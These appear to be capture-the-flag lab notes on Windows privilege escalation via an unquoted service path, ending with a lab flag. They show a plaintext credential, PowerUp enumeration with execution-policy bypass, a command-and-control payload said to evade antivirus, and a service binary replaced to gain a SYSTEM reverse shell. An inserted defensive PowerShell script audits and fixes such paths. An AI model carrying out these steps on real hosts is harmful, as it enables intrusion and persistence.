Got the credentials for a domain user on another machine
└─$ proxychains xfreerdp /u:ipsec /v:172.16.1.36 /p:TryHarder.1234
No local admin rights, so need to perform privilege escalation
If the firewall blocks you from uploading anything, you need to perform manual enumeration.
Upload winPEAS, PowerUp, PowerView
cmd> powershell -executionpolicy bypass
PS> Import-Module C:\temp\powerup.ps1
PS> Invoke-AllChecks
# permission check of the folders
PS> Get-Acl
PS> Get-ChildItem | Get-Acl
Unquoted service path found
https://geekmemos.com/2019/02/25/privilege-escalation/
# Command that I didn't use but also works
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
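An added audit script, not part of the original notes, that does from the defender's side what the wmic one-liner does from the attacker's: it walks HKLM:\SYSTEM\CurrentControlSet\Services, reports every service whose ImagePath is unquoted and has whitespace in the executable portion, and with -Fix rewrites the value with quotes so the service manager no longer has to guess where the path ends. It assumes an elevated PowerShell 5.1 or later session on the host being audited; the parameter name -Fix and the output columns are this example's own choices.

```powershell
# Added example (not from the original notes): find services with unquoted
# ImagePath values containing spaces and, with -Fix, quote the executable part.
# Assumes an elevated PowerShell 5.1+ session on the host being audited.
[CmdletBinding()]
param([switch]$Fix)

$servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$findings = New-Object System.Collections.Generic.List[object]

foreach ($svc in Get-ChildItem -Path $servicesKey -ErrorAction SilentlyContinue) {
    # Read the raw value so %SystemRoot%-style paths are kept exactly as stored
    $raw = $svc.GetValue('ImagePath', $null, 'DoNotExpandEnvironmentNames')
    if (-not $raw) { continue }
    $path = [string]$raw

    # Already quoted, or no whitespace anywhere: nothing to do
    if ($path.TrimStart().StartsWith('"')) { continue }
    if ($path -notmatch '\s') { continue }

    # Split the executable from its arguments at the first ".exe"; the path
    # is only ambiguous when the executable portion itself contains whitespace
    $m = [regex]::Match($path, '^(?<exe>.+?\.exe)(?<rest>.*)$', 'IgnoreCase')
    if (-not $m.Success) { continue }
    $exe  = $m.Groups['exe'].Value
    $rest = $m.Groups['rest'].Value
    if ($exe -notmatch '\s') { continue }

    # Start type matters for triage: automatic services run without a user action
    $startType = (Get-Service -Name $svc.PSChildName -ErrorAction SilentlyContinue).StartType
    $fixed = '"{0}"{1}' -f $exe, $rest
    $findings.Add([pscustomobject]@{
        Service   = $svc.PSChildName
        StartType = $startType
        ImagePath = $path
        Proposed  = $fixed
    })

    if ($Fix) {
        # Preserve the value kind (REG_SZ vs REG_EXPAND_SZ) when rewriting
        $kind = $svc.GetValueKind('ImagePath')
        Set-ItemProperty -Path $svc.PSPath -Name ImagePath -Value $fixed -Type $kind
        Write-Verbose "Quoted ImagePath for service $($svc.PSChildName)"
    }
}

$findings | Format-Table -AutoSize
```

Run it without -Fix first to review the list; the Proposed column is exactly what -Fix writes. After fixing, restart each affected service and confirm it comes up, since a vendor installer that wrote the unquoted path will write it again on repair or upgrade, so the audit belongs in a scheduled baseline check rather than a one-off.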
Start the Havoc client and teamserver
Change the IP in the config file
cd Havoc/Client
./Havoc
cd Teamserver
sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug
# Usernames and passwords for logging into the client are in the profile file
Set up a listener and generate the payload
I used this method because the executable obtained from Havoc can bypass the real-time virus monitoring
Upload
- Upload the file
- Rename the shell to the name of the service executable
- Paste it into the service folder, renaming the original service executable first so there is a backup of it
- Restart the system and relogin
At this stage we have a system shell in havoc client
Steps After Obtaining a Reverse Shell
Flag
OFFSHORE{4t_y0ur_5erv1ce} cuckoo's egg